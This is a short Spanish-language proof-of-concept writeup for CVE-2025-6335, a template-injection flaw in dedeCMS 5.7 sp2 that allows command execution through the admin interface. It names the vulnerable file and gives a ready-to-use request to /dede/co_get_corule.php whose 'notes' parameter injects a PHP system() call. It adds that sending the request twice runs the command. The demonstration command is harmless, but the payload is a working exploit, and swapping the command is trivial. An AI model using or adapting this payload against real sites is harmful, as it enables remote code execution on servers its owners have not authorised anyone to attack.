
Exploit de prueba de concepto para CVE-2025-6335, una vulnerabilidad de inyección de plantillas que permite la ejecución de comandos en dedeCMS 5.7 sp2, posibilitando la ejecución arbitraria de comandos a través de la interfaz de administración.
BUG_Author: Ewoji
Versión afectada: dedeCMS < 5.7.2
Proveedor: Shanghai Zhuozhuo Network Technology Co., LTD
Software: dedeCMS
Archivos vulnerables:
/include/dedetag.class.phpDespués de la instalación, inicie sesión en el panel de administración
Explotación de la plantilla
Verificación de la explotación:
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
Acceder dos veces de esta manera permite ejecutar el comando